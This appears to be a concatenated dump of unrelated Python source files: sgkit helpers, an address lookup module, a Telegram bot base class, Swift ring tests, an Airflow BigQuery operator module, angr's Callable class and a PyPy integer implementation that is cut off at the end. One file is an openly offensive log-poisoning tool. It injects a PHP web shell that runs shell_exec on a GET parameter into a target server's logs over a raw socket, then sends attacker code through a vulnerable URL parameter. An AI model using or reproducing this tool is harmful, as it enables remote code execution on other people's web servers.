"""Define a variable in a dataset using the given function if it's missing.
Parameters
----------
ds : Dataset
The dataset to look for the variable, and used by the function to calculate the variable.
default_variable_name
The default name of the variable.
variable_name
The actual name of the variable, or None to use the default.
func
The function to calculate the variable.
Returns
-------
A new dataset containing the variable.
Raises
------
ValueError
If a variable with a non-default name is missing from the dataset.
"""
variable_name = variable_name or default_variable_name
if variable_name in ds:
return ds
if variable_name != default_variable_name:
raise ValueError(
f"Variable '{variable_name}' with non-default name is missing and will not be automatically defined."
)
return func(ds)
def create_dataset(
data_vars: Mapping[Hashable, Any] = None, # type: ignore[assignment]
coords: Mapping[Hashable, Any] = None, # type: ignore[assignment]
attrs: Mapping[Hashable, Any] = None, # type: ignore[assignment]
) -> Dataset:
"""Create an Xarray dataset and validate its variables.
This is a wrapper around `xarray.Dataset`, with the additional
convenience of validating variables against the ones defined by sgkit,
and annotating these variables with a `comment` attribute containing
their doc comments.
Parameters
----------
data_vars
A mapping defining data variables.
coords
A mapping defining coordinates.
attrs
Global attributes.
Returns
-------
A new dataset.
"""
ds = Dataset(data_vars, coords, attrs)
ds = variables.annotate(ds)
return ds
def split_array_chunks(n: int, blocks: int) -> Tuple[int, ...]:
"""Compute chunk sizes for an array split into blocks.
This is similar to `numpy.split_array` except that it
will compute the sizes of the resulting splits rather
than explicitly partitioning an array.
Parameters
----------
n
Number of array elements.
blocks
Number of partitions to generate chunk sizes for.
Examples
--------
>>> split_array_chunks(7, 2)
(4, 3)
>>> split_array_chunks(7, 3)
(3, 2, 2)
>>> split_array_chunks(7, 1)
(7,)
>>> split_array_chunks(7, 7)
(1, 1, 1, 1, 1, 1, 1)
Raises
------
ValueError
* If `blocks` > `n`.
* If `n` <= 0.
* If `blocks` <= 0.
Returns
-------
chunks : Tuple[int, ...]
Number of elements associated with each block.
This will equal `n//blocks` or `n//blocks + 1` for
each block, depending on how many of the latter
are necessary to make the partitioning complete.
"""
if blocks > n:
raise ValueError(
f"Number of blocks ({blocks}) cannot be greater "
f"than number of elements ({n})"
)
if n <= 0:
raise ValueError(f"Number of elements ({n}) must be >= 0")
if blocks <= 0:
raise ValueError(f"Number of blocks ({blocks}) must be >= 0")
n_div, n_mod = np.divmod(n, blocks)
chunks = n_mod * (n_div + 1,) + (blocks - n_mod) * (n_div,)
return chunks # type: ignore[no-any-return]
def max_str_len(a: ArrayLike) -> ArrayLike:
"""Compute maximum string length for elements of an array
Parameters
----------
a
Array of any shape, must have string or object dtype
Returns
-------
max_length
Scalar array with same type as provided array
"""
if a.size == 0:
raise ValueError("Max string length cannot be calculated for empty array")
if a.dtype.kind == "O":
a = a.astype(str)
if a.dtype.kind not in {"U", "S"}:
raise ValueError(f"Array must have string dtype (got dtype {a.dtype})")
lens = np.frompyfunc(len, 1, 1)(a) # type: ignore[no-untyped-call]
if isinstance(a, np.ndarray):
lens = np.asarray(lens)
return lens.max()
@guvectorize( # type: ignore
[
"void(int8[:], int64[:])",
"void(int16[:], int64[:])",
"void(int32[:], int64[:])",
"void(int64[:], int64[:])",
],
"(n)->()",
nopython=True,
cache=True,
)
def hash_array(x: ArrayLike, out: ArrayLike) -> None: # pragma: no cover
"""Hash entries of ``x`` using the DJBX33A hash function.
This is ~5 times faster than calling ``tobytes()`` followed
by ``hash()`` on array columns. This function also does not
hold the GIL, making it suitable for use with the Dask
threaded scheduler.
Parameters
----------
x
1D array of type integer.
Returns
-------
Array containing a single hash value of type int64.
"""
out[0] = 5381
for i in range(x.shape[0]):
out[0] = out[0] * 33 + x[i]
|
py | 1a40b115f802caa52f93c7912c18a0397b9f2122 | #!/usr/bin/env python
import urllib
import requests
import argparse
import socket
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', required=True, type=str, help='file with code to send')
parser.add_argument('-u', '--url', required=True, type=str, help='full vulnerable url (minus injected parameter')
parser.add_argument('-p', '--parameter', required=True, type=str, help='injected parameter (ex: cmd)')
parser.add_argument('-v', '--verbose', action='count', default=0, help='v: increased detail; vv: even more detail')
parser.add_argument('--inject', action='store_true', help='inject php parse code')
parser.add_argument('--target', type=str, help='target to inject parser')
parser.add_argument('--port', default=80, type=int, help='port to inject (default: 80)')
args = parser.parse_args()
def inject_php_parser(target, port, parameter, verbose):
if target is None:
print '[!] you must provide a target with the inject parameter! Exiting...'
exit(2)
if target.startswith('http://'):
tmp_target = target[7:]
elif target.startswith('https://'):
tmp_target = target[8:]
else:
tmp_target = target
local_target = socket.gethostbyname(tmp_target)
param_parse = "<?php echo shell_exec($_GET['{0}']);?>".format(parameter)
print '[+] inject php parameter parser enabled'
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose > 0:
print '[+] connecting to {0} on port {1}'.format(local_target, port)
client.connect((local_target, port))
if verbose > 0:
print '[+] injecting: {0}'.format(param_parse)
client.send(param_parse + '\x0d\x0a')
client.close()
def poision_web_logs(infile, inurl, parameter, verbose):
print '[+] url: {0}, parameter: {1}'.format(inurl, parameter)
with open(infile, 'rb') as f:
print '[+] code read from file: {0}'.format(infile)
print '[+] sending requests...'
status_codes = []
for line in f.readlines():
# eliminate whitespace & newlines
line = line.strip()
tmp_url = inurl.split('&')
if verbose > 1:
print
print 'VERBOSE: {0}'.format(tmp_url)
# save end parameter separate, in case of null byte inclusion
end_url = ''
if len(tmp_url) > 0:
end_url = tmp_url.pop()
if verbose > 1:
print 'VERBOSE: {0}'.format(end_url)
# stitch url back together with &'s
url = '&'.join(tmp_url)
# strip leftmost &
url = url.lstrip('&')
if verbose > 1:
print 'VERBOSE: {0}'.format(url)
# append the parameter + encoded line of code + last parameter
url += '&{0}={1}&{2}'.format(parameter, urllib.quote_plus(line), end_url).rstrip('&')
if verbose > 1:
print 'VERBOSE: {0}'.format(url)
if verbose > 0:
print '[+] sending: {0}'.format(url)
r = requests.get(url, headers={'user-agent': 'Mozilla'})
status_codes.append(r.status_code)
if verbose > 0:
if r.status_code == 200:
print '[+] success!'
else:
print '[!] error: {0} - {1}'.format(r.status_code, r.reason)
if len(set(status_codes)) == 1 and 200 in set(status_codes):
print '[+] 100% successful transfer!'
else:
print '[!] You encountered errors with the transfer. Response codes: {}'.format(set(status_codes))
if __name__ == '__main__':
if args.inject:
inject_php_parser(args.target, args.port, args.parameter, args.verbose)
poision_web_logs(args.file, args.url, args.parameter, args.verbose)
|
py | 1a40b15add0bc5a380920aa770910e39db1dd7c0 | import json, urllib
import xmltodict
import logging
import concurrent.futures
from urllib import request, parse
from .parser import search_result
from .proj_convertor import ProjConvertor
from .address_factory import AddressFactory
logger = logging.getLogger(__name__)
OGCIO_RECORD_COUNT = 200
NEAR_THRESHOLD = 0.05 # 50 metres
def search_address_with_ogcio(address):
ogcio_url = "https://www.als.ogcio.gov.hk/lookup?q={}&n={}".format(
parse.quote(address), OGCIO_RECORD_COUNT
)
post_response = urllib.request.urlopen(url=ogcio_url)
res = post_response.read()
ogcio_data = json.dumps(xmltodict.parse(res), ensure_ascii=False)
ogcio_data = json.loads(ogcio_data)
searched_result = search_result(address, ogcio_data)
ocgio_records = []
for data in searched_result:
address_factory = AddressFactory("ogcio", data)
ocgio_records.append(address_factory.create_address())
return ocgio_records
def search_address_from_land(address):
land_url = "https://geodata.gov.hk/gs/api/v1.0.0/locationSearch?q={}".format(
parse.quote(address)
)
post_response = urllib.request.urlopen(url=land_url)
res = post_response.read()
land_data = json.loads(res)
land_records = []
for data in land_data:
# TODO: check if def is needed
proj = ProjConvertor("EPSG:2326", "EPSG:4326", data["x"], data["y"])
lat, lng = proj.transform_projection()
data["lat"] = float("{0:.4f}".format(lat))
data["lng"] = float("{0:.4f}".format(lng))
address_factory = AddressFactory("land", data)
land_records.append(address_factory.create_address())
return land_records
def query_address(address):
# Fetch records from OGCIO & Land Department
ogcio_records = search_address_with_ogcio(address)
land_records = search_address_from_land(address)
sorted_results = []
# if records from Land Department have any exception
if len(land_records) == 0:
return ogcio_records
# 1. Best Case: Top OGCIO result appears in land result(s)
# We compared with the first in land result but some cases that sometime the most accurate result does not appear at top
# so we should search among the whole list
for land_record in land_records:
if ogcio_records[0].distance_to(land_record) < NEAR_THRESHOLD:
# Best Case: Land result and ogcio return the same address
return ogcio_records
# 2. best result from OGCIO does not appears in the land results
# so we pick the first land result as our destination and search all the OGCIO results and see if some result is within the NEAR_DISTANCE
# and sort them with distance to the first land result
for ogcio_record in ogcio_records:
distance = ogcio_record.distance_to(land_records[0])
if distance < NEAR_THRESHOLD:
ogcio_record["distance"] = distance
sorted_results.append(ogcio_record)
if len(sorted_results) > 0:
return sorted_results.sort(key=lambda record: record.distance)
# 3. Not found in OGCIO but in land result.
# We try to search again from ogcio using the land result
assumed_land_result = land_records[0]
full_address_to_search = land_records[0].full_address("chi")
if full_address_to_search != "":
ogcio_records = search_address_with_ogcio(full_address_to_search)
if ogcio_records[0].distance_to(assumed_land_result) < NEAR_THRESHOLD:
# second round result is the nearest result
return ogcio_records
return land_records
def batch_query_addresses(addresses):
records = []
with concurrent.futures.ProcessPoolExecutor(max_workers=5) as executor:
futures = [executor.submit(query_address, address) for address in addresses]
for future in concurrent.futures.as_completed(futures):
records.append(future.result())
return records
|
py | 1a40b19f05bc1d9fbb691f39d692eac7b83b6a2e | from aiogram import Bot
from aiogram.contrib.middlewares.logging import LoggingMiddleware
from aiogram.dispatcher import Dispatcher
from aiogram.utils.executor import start_webhook, start_polling
from loguru import logger as log
from abc import ABC, abstractmethod
from utils.singletone import SingletonABC
from utils.json_config_reader import parse_config
from aiogram.contrib.fsm_storage.memory import MemoryStorage
class AbstractModel(SingletonABC):
def __init__(self, config_file_name='project.json'):
self.config = parse_config(config_file_name)
self._bot = Bot(token=self.config.api.token)
self._memory_storage = MemoryStorage()
self._dispatcher = Dispatcher(self._bot, storage = self._memory_storage)
self._dispatcher.middleware.setup(LoggingMiddleware())
def get_dispatcher(self):
return self._dispatcher
def get_bot(self):
return self._bot
def get_storage(self):
return self._memory_storage
@abstractmethod
async def on_startup(self, _dispatcher):
pass
@abstractmethod
async def on_shutdown(self, _dispatcher):
log.info("Closing storage...")
await _dispatcher.storage.close()
await _dispatcher.storage.wait_closed()
log.info("Bot shutdown...")
@abstractmethod
def start(self):
pass
class WebhookModel(AbstractModel):
async def on_startup(self, _dispatcher):
await super().on_startup(_dispatcher)
await self._bot.set_webhook(self.config.webhook.host + self.config.webhook.path)
async def on_shutdown(self, _dispatcher):
await super().on_shutdown(_dispatcher)
await self._bot.delete_webhook()
def start(self):
log.warning("The application is running in webhook mode.")
start_webhook(
dispatcher=self._dispatcher,
webhook_path=self.config.webhook.path,
on_startup=self.on_startup,
on_shutdown=self.on_shutdown,
skip_updates=True,
host=self.config.webapp.host,
port=self.config.webapp.port,
)
class PollingModel(AbstractModel):
async def on_startup(self, _dispatcher):
await super().on_startup(_dispatcher)
async def on_shutdown(self, _dispatcher):
await super().on_shutdown(_dispatcher)
def start(self):
log.warning("The application is running in polling mode.")
start_polling(
dispatcher=self._dispatcher,
skip_updates=True,
on_shutdown=self.on_shutdown,
on_startup=self.on_startup
)
|
py | 1a40b1a9ab40de6b34bcbd899ea03129d79969cf | import mock
import unittest
import manager
def create_mock_load_builder_fn(mock_rings):
"""To avoid the need for swift.common.ring library, mock a basic rings
dictionary, keyed by path. Each ring has enough logic to hold a dictionary
with a single 'devs' key, which stores the list of passed dev(s) by
add_dev().
If swift (actual) ring representation diverges (see _load_builder),
this mock will need to be adapted.
:param mock_rings: a dict containing the dict form of the rings
"""
def mock_load_builder_fn(path):
class mock_ring(object):
def __init__(self, path):
self.path = path
def to_dict(self):
return mock_rings[self.path]
def add_dev(self, dev):
mock_rings[self.path]['devs'].append(dev)
return mock_ring(path)
return mock_load_builder_fn
MOCK_SWIFT_RINGS = {
'account': 'account.builder',
'container': 'container.builder',
'object': 'object.builder'
}
class TestSwiftManager(unittest.TestCase):
@mock.patch('os.path.isfile')
@mock.patch.object(manager, '_load_builder')
def test_has_minimum_zones(self, mock_load_builder, mock_is_file):
mock_rings = {}
mock_load_builder.side_effect = create_mock_load_builder_fn(mock_rings)
for ring in MOCK_SWIFT_RINGS:
mock_rings[ring] = {
'replicas': 3,
'devs': [{'zone': 1}, {'zone': 2}, None, {'zone': 3}],
}
ret = manager.has_minimum_zones(MOCK_SWIFT_RINGS)
self.assertTrue(ret['result'])
# Increase the replicas to make sure that it returns false
for ring in MOCK_SWIFT_RINGS:
mock_rings[ring]['replicas'] = 4
ret = manager.has_minimum_zones(MOCK_SWIFT_RINGS)
self.assertFalse(ret['result'])
@mock.patch.object(manager, '_load_builder')
def test_exists_in_ring(self, mock_load_builder):
mock_rings = {}
mock_load_builder.side_effect = create_mock_load_builder_fn(mock_rings)
ring = 'account'
mock_rings[ring] = {
'devs': [
{'replication_port': 6000, 'zone': 1, 'weight': 100.0,
'ip': '172.16.0.2', 'region': 1, 'port': 6000,
'replication_ip': '172.16.0.2', 'parts': 2, 'meta': '',
'device': u'bcache10', 'parts_wanted': 0, 'id': 199},
None, # Ring can have holes, so add None to simulate
{'replication_port': 6000, 'zone': 1, 'weight': 100.0,
'ip': '172.16.0.2', 'region': 1, 'id': 198,
'replication_ip': '172.16.0.2', 'parts': 2, 'meta': '',
'device': u'bcache13', 'parts_wanted': 0, 'port': 6000},
]
}
node = {
'ip': '172.16.0.2',
'region': 1,
'account_port': 6000,
'zone': 1,
'replication_port': 6000,
'weight': 100.0,
'device': u'bcache10',
}
ret = manager.exists_in_ring(ring, node)
self.assertTrue(ret)
node['region'] = 2
ret = manager.exists_in_ring(ring, node)
self.assertFalse(ret)
@mock.patch.object(manager, '_write_ring')
@mock.patch.object(manager, '_load_builder')
def test_add_dev(self, mock_load_builder, mock_write_ring):
mock_rings = {}
mock_load_builder.side_effect = create_mock_load_builder_fn(mock_rings)
ring = 'account'
mock_rings[ring] = {
'devs': []
}
new_dev = {
'meta': '',
'zone': 1,
'ip': '172.16.0.2',
'device': '/dev/sdb',
'port': 6000,
'weight': 100
}
manager.add_dev(ring, new_dev)
mock_write_ring.assert_called_once()
self.assertTrue('id' not in mock_rings[ring]['devs'][0])
|
py | 1a40b1c37f4593980c4a96f8111e1b393e9ec978 | # Generated by Django 3.1.6 on 2021-06-13 16:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0002_auto_20210613_1056'),
]
operations = [
migrations.AddField(
model_name='submission',
name='details',
field=models.TextField(blank=True, max_length=10000),
),
]
|
py | 1a40b256249697a2bb77d986fe2f208acd212ddd | def addition(a,b):
return a+b
def subtraction(a,b):
return a-b
def multiplication(a,b):
return a*b
def division(a,b):
return (a/b)
|
py | 1a40b26ff888344b053665689a9ce7b25d272aca | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.contrib.hooks.bigquery_hook import BigQueryHook
from airflow.operators.check_operator import \
CheckOperator, ValueCheckOperator, IntervalCheckOperator
from airflow.utils.decorators import apply_defaults
class BigQueryCheckOperator(CheckOperator):
"""
Performs checks against BigQuery. The ``BigQueryCheckOperator`` expects
a sql query that will return a single row. Each value on that
first row is evaluated using python ``bool`` casting. If any of the
values return ``False`` the check is failed and errors out.
Note that Python bool casting evals the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
the count ``== 0``. You can craft much more complex query that could,
for instance, check that the table has the same number of rows as
the source table upstream, or that the count of today's partition is
greater than yesterday's partition, or that a set of metrics are less
than 3 standard deviation for the 7 day average.
This operator can be used as a data quality check in your pipeline, and
depending on where you put it in your DAG, you have the choice to
stop the critical path, preventing from
publishing dubious data, or on the side and receive email alerts
without stopping the progress of the DAG.
:param sql: the sql to be executed
:type sql: str
:param bigquery_conn_id: reference to the BigQuery database
:type bigquery_conn_id: str
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
"""
template_fields = ('sql',)
template_ext = ('.sql', )
@apply_defaults
def __init__(self,
sql,
bigquery_conn_id='bigquery_default',
use_legacy_sql=True,
*args, **kwargs):
super(BigQueryCheckOperator, self).__init__(sql=sql, *args, **kwargs)
self.bigquery_conn_id = bigquery_conn_id
self.sql = sql
self.use_legacy_sql = use_legacy_sql
def get_db_hook(self):
return BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
use_legacy_sql=self.use_legacy_sql)
class BigQueryValueCheckOperator(ValueCheckOperator):
"""
Performs a simple value check using sql code.
:param sql: the sql to be executed
:type sql: str
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
"""
template_fields = ('sql',)
template_ext = ('.sql', )
@apply_defaults
def __init__(self, sql,
pass_value,
tolerance=None,
bigquery_conn_id='bigquery_default',
use_legacy_sql=True,
*args, **kwargs):
super(BigQueryValueCheckOperator, self).__init__(
sql=sql, pass_value=pass_value, tolerance=tolerance,
*args, **kwargs)
self.bigquery_conn_id = bigquery_conn_id
self.use_legacy_sql = use_legacy_sql
def get_db_hook(self):
return BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
use_legacy_sql=self.use_legacy_sql)
class BigQueryIntervalCheckOperator(IntervalCheckOperator):
"""
Checks that the values of metrics given as SQL expressions are within
a certain tolerance of the ones from days_back before.
This method constructs a query like so ::
SELECT {metrics_threshold_dict_key} FROM {table}
WHERE {date_filter_column}=<date>
:param table: the table name
:type table: str
:param days_back: number of days between ds and the ds we want to check
against. Defaults to 7 days
:type days_back: int
:param metrics_threshold: a dictionary of ratios indexed by metrics, for
example 'COUNT(*)': 1.5 would require a 50 percent or less difference
between the current day, and the prior days_back.
:type metrics_threshold: dict
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
"""
template_fields = ('table',)
@apply_defaults
def __init__(self, table, metrics_thresholds, date_filter_column='ds',
days_back=-7, bigquery_conn_id='bigquery_default',
use_legacy_sql=True, *args, **kwargs):
super(BigQueryIntervalCheckOperator, self).__init__(
table=table, metrics_thresholds=metrics_thresholds,
date_filter_column=date_filter_column, days_back=days_back,
*args, **kwargs)
self.bigquery_conn_id = bigquery_conn_id
self.use_legacy_sql = use_legacy_sql
def get_db_hook(self):
return BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
use_legacy_sql=self.use_legacy_sql)
|
py | 1a40b27eb0f8532faa25578096e8d0ba4f5f9190 | from .calling_conventions import DEFAULT_CC
class Callable(object):
"""
Callable is a representation of a function in the binary that can be
interacted with like a native python function.
If you set perform_merge=True (the default), the result will be returned to you, and
you can get the result state with callable.result_state.
Otherwise, you can get the resulting simulation manager at callable.result_path_group.
"""
def __init__(self, project, addr, concrete_only=False, perform_merge=True, base_state=None, toc=None, cc=None):
"""
:param project: The project to operate on
:param addr: The address of the function to use
The following parameters are optional:
:param concrete_only: Throw an exception if the execution splits into multiple paths
:param perform_merge: Merge all result states into one at the end (only relevant if concrete_only=False)
:param base_state: The state from which to do these runs
:param toc: The address of the table of contents for ppc64
:param cc: The SimCC to use for a calling convention
"""
self._project = project
self._addr = addr
self._concrete_only = concrete_only
self._perform_merge = perform_merge
self._base_state = base_state
self._toc = toc
self._cc = cc if cc is not None else DEFAULT_CC[project.arch.name](project.arch)
self._deadend_addr = project.simos.return_deadend
self.result_path_group = None
self.result_state = None
def set_base_state(self, state):
"""
Swap out the state you'd like to use to perform the call
:param state: The state to use to perform the call
"""
self._base_state = state
def __call__(self, *args):
self.perform_call(*args)
if self.result_state is not None:
return self.result_state.solver.simplify(self._cc.get_return_val(self.result_state, stack_base=self.result_state.regs.sp - self._cc.STACKARG_SP_DIFF))
else:
return None
def perform_call(self, *args):
state = self._project.factory.call_state(self._addr, *args,
cc=self._cc,
base_state=self._base_state,
ret_addr=self._deadend_addr,
toc=self._toc)
def step_func(pg):
pg2 = pg.prune()
if len(pg2.active) > 1:
raise AngrCallableMultistateError("Execution split on symbolic condition!")
return pg2
caller = self._project.factory.simulation_manager(state)
caller.run(step_func=step_func if self._concrete_only else None).unstash(from_stash='deadended')
caller.prune(filter_func=lambda pt: pt.addr == self._deadend_addr)
if len(caller.active) == 0:
raise AngrCallableError("No paths returned from function")
self.result_path_group = caller.copy()
if self._perform_merge:
caller.merge()
self.result_state = caller.active[0]
from .errors import AngrCallableError, AngrCallableMultistateError
|
py | 1a40b3984269800be6df9984f6a540efdc004a85 | """Implementation of the int type based on r_longlong.
Useful for 32-bit applications manipulating values a bit larger than
fits in an 'int'.
"""
import operator
from rpython.rlib.rarithmetic import LONGLONG_BIT, intmask, r_longlong, r_uint
from rpython.rlib.rbigint import rbigint
from rpython.tool.sourcetools import func_renamer, func_with_new_name
from pypy.interpreter.error import oefmt
from pypy.interpreter.gateway import WrappedDefault, unwrap_spec
from pypy.objspace.std.intobject import W_IntObject
from pypy.objspace.std.longobject import W_AbstractLongObject, W_LongObject
from pypy.objspace.std.util import COMMUTATIVE_OPS
# XXX: breaks translation
#LONGLONG_MIN = r_longlong(-1 << (LONGLONG_BIT - 1))
class W_SmallLongObject(W_AbstractLongObject):
_immutable_fields_ = ['longlong']
def __init__(self, value):
assert isinstance(value, r_longlong)
self.longlong = value
@staticmethod
def fromint(value):
return W_SmallLongObject(r_longlong(value))
@staticmethod
def frombigint(bigint):
return W_SmallLongObject(bigint.tolonglong())
def asbigint(self):
return rbigint.fromrarith_int(self.longlong)
def longval(self):
return self.longlong
def __repr__(self):
return '<W_SmallLongObject(%d)>' % self.longlong
def _int_w(self, space):
a = self.longlong
b = intmask(a)
if b == a:
return b
raise oefmt(space.w_OverflowError,
"long int too large to convert to int")
def uint_w(self, space):
a = self.longlong
if a < 0:
raise oefmt(space.w_ValueError,
"cannot convert negative integer to unsigned int")
b = r_uint(a)
if r_longlong(b) == a:
return b
raise oefmt(space.w_OverflowError,
"long int too large to convert to unsigned int")
def bigint_w(self, space, allow_conversion=True):
return self.asbigint()
def _bigint_w(self, space):
return self.asbigint()
def _float_w(self, space):
return float(self.longlong)
def int(self, space):
if type(self) is W_SmallLongObject:
return self
if not space.is_overloaded(self, space.w_int, '__int__'):
return W_LongObject(self.num)
return W_Root.int(self, space)
def descr_float(self, space):
return space.newfloat(float(self.longlong))
def descr_neg(self, space):
a = self.longlong
try:
if a == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
x = -a
except OverflowError:
self = _small2long(space, self)
return self.descr_neg(space)
return W_SmallLongObject(x)
def descr_abs(self, space):
return self if self.longlong >= 0 else self.descr_neg(space)
def descr_bool(self, space):
return space.newbool(bool(self.longlong))
def descr_invert(self, space):
x = ~self.longlong
return W_SmallLongObject(x)
@unwrap_spec(w_modulus=WrappedDefault(None))
def descr_pow(self, space, w_exponent, w_modulus=None):
if isinstance(w_exponent, W_AbstractLongObject):
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
elif not isinstance(w_exponent, W_IntObject):
return space.w_NotImplemented
x = self.longlong
y = space.int_w(w_exponent)
if space.is_none(w_modulus):
try:
return _pow(space, x, y, r_longlong(0))
except ValueError:
self = self.descr_float(space)
return space.pow(self, w_exponent, space.w_None)
except OverflowError:
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
elif isinstance(w_modulus, W_IntObject):
w_modulus = w_modulus.as_w_long(space)
elif not isinstance(w_modulus, W_AbstractLongObject):
return space.w_NotImplemented
elif not isinstance(w_modulus, W_SmallLongObject):
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
z = w_modulus.longlong
if z == 0:
raise oefmt(space.w_ValueError, "pow() 3rd argument cannot be 0")
if y < 0:
# don't implement with smalllong
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
try:
return _pow(space, x, y, z)
except ValueError:
self = self.descr_float(space)
return space.pow(self, w_exponent, w_modulus)
except OverflowError:
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
@unwrap_spec(w_modulus=WrappedDefault(None))
def descr_rpow(self, space, w_base, w_modulus=None):
if isinstance(w_base, W_IntObject):
# Defer to w_base<W_SmallLongObject>.descr_pow
w_base = w_base.descr_long(space)
elif not isinstance(w_base, W_AbstractLongObject):
return space.w_NotImplemented
return w_base.descr_pow(space, self, w_modulus)
def _make_descr_cmp(opname):
op = getattr(operator, opname)
bigint_op = getattr(rbigint, opname)
@func_renamer('descr_' + opname)
def descr_cmp(self, space, w_other):
if isinstance(w_other, W_IntObject):
result = op(self.longlong, w_other.int_w(space))
elif not isinstance(w_other, W_AbstractLongObject):
return space.w_NotImplemented
elif isinstance(w_other, W_SmallLongObject):
result = op(self.longlong, w_other.longlong)
else:
result = bigint_op(self.asbigint(), w_other.asbigint())
return space.newbool(result)
return descr_cmp
descr_lt = _make_descr_cmp('lt')
descr_le = _make_descr_cmp('le')
descr_eq = _make_descr_cmp('eq')
descr_ne = _make_descr_cmp('ne')
descr_gt = _make_descr_cmp('gt')
descr_ge = _make_descr_cmp('ge')
def _make_descr_binop(func, ovf=True):
opname = func.__name__[1:]
descr_name, descr_rname = 'descr_' + opname, 'descr_r' + opname
long_op = getattr(W_LongObject, descr_name)
@func_renamer(descr_name)
def descr_binop(self, space, w_other):
if isinstance(w_other, W_IntObject):
w_other = w_other.as_w_long(space)
elif not isinstance(w_other, W_AbstractLongObject):
return space.w_NotImplemented
elif not isinstance(w_other, W_SmallLongObject):
self = _small2long(space, self)
return long_op(self, space, w_other)
if ovf:
try:
return func(self, space, w_other)
except OverflowError:
self = _small2long(space, self)
w_other = _small2long(space, w_other)
return long_op(self, space, w_other)
else:
return func(self, space, w_other)
if opname in COMMUTATIVE_OPS:
@func_renamer(descr_rname)
def descr_rbinop(self, space, w_other):
return descr_binop(self, space, w_other)
return descr_binop, descr_rbinop
long_rop = getattr(W_LongObject, descr_rname)
@func_renamer(descr_rname)
def descr_rbinop(self, space, w_other):
if isinstance(w_other, W_IntObject):
w_other = w_other.as_w_long(space)
elif not isinstance(w_other, W_AbstractLongObject):
return space.w_NotImplemented
elif not isinstance(w_other, W_SmallLongObject):
self = _small2long(space, self)
return long_rop(self, space, w_other)
if ovf:
try:
return func(w_other, space, self)
except OverflowError:
self = _small2long(space, self)
w_other = _small2long(space, w_other)
return long_rop(self, space, w_other)
else:
return func(w_other, space, self)
return descr_binop, descr_rbinop
def _add(self, space, w_other):
x = self.longlong
y = w_other.longlong
z = x + y
if ((z ^ x) & (z ^ y)) < 0:
raise OverflowError
return W_SmallLongObject(z)
descr_add, descr_radd = _make_descr_binop(_add)
def _sub(self, space, w_other):
x = self.longlong
y = w_other.longlong
z = x - y
if ((z ^ x) & (z ^ ~y)) < 0:
raise OverflowError
return W_SmallLongObject(z)
descr_sub, descr_rsub = _make_descr_binop(_sub)
def _mul(self, space, w_other):
x = self.longlong
y = w_other.longlong
z = _llong_mul_ovf(x, y)
return W_SmallLongObject(z)
descr_mul, descr_rmul = _make_descr_binop(_mul)
def _floordiv(self, space, w_other):
x = self.longlong
y = w_other.longlong
try:
if y == -1 and x == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
z = x // y
except ZeroDivisionError:
raise oefmt(space.w_ZeroDivisionError, "integer division by zero")
return W_SmallLongObject(z)
descr_floordiv, descr_rfloordiv = _make_descr_binop(_floordiv)
def _mod(self, space, w_other):
x = self.longlong
y = w_other.longlong
try:
if y == -1 and x == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
z = x % y
except ZeroDivisionError:
raise oefmt(space.w_ZeroDivisionError, "integer modulo by zero")
return W_SmallLongObject(z)
descr_mod, descr_rmod = _make_descr_binop(_mod)
def _divmod(self, space, w_other):
x = self.longlong
y = w_other.longlong
try:
if y == -1 and x == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
z = x // y
except ZeroDivisionError:
raise oefmt(space.w_ZeroDivisionError, "integer divmod by zero")
# no overflow possible
m = x % y
return space.newtuple([W_SmallLongObject(z), W_SmallLongObject(m)])
descr_divmod, descr_rdivmod = _make_descr_binop(_divmod)
def _lshift(self, space, w_other):
a = self.longlong
# May overflow
b = space.int_w(w_other)
if r_uint(b) < LONGLONG_BIT: # 0 <= b < LONGLONG_BIT
c = a << b
if a != (c >> b):
raise OverflowError
return W_SmallLongObject(c)
if b < 0:
raise oefmt(space.w_ValueError, "negative shift count")
# b >= LONGLONG_BIT
if a == 0:
return self
raise OverflowError
descr_lshift, descr_rlshift = _make_descr_binop(_lshift)
def _rshift(self, space, w_other):
a = self.longlong
# May overflow
b = space.int_w(w_other)
if r_uint(b) >= LONGLONG_BIT: # not (0 <= b < LONGLONG_BIT)
if b < 0:
raise oefmt(space.w_ValueError, "negative shift count")
# b >= LONGLONG_BIT
if a == 0:
return self
a = -1 if a < 0 else 0
else:
a = a >> b
return W_SmallLongObject(a)
descr_rshift, descr_rrshift = _make_descr_binop(_rshift, ovf=False)
def _and(self, space, w_other):
a = self.longlong
b = w_other.longlong
res = a & b
return W_SmallLongObject(res)
descr_and, descr_rand = _make_descr_binop(_and, ovf=False)
def _or(self, space, w_other):
a = self.longlong
b = w_other.longlong
res = a | b
return W_SmallLongObject(res)
descr_or, descr_ror = _make_descr_binop(_or, ovf=False)
def _xor(self, space, w_other):
a = self.longlong
b = w_other.longlong
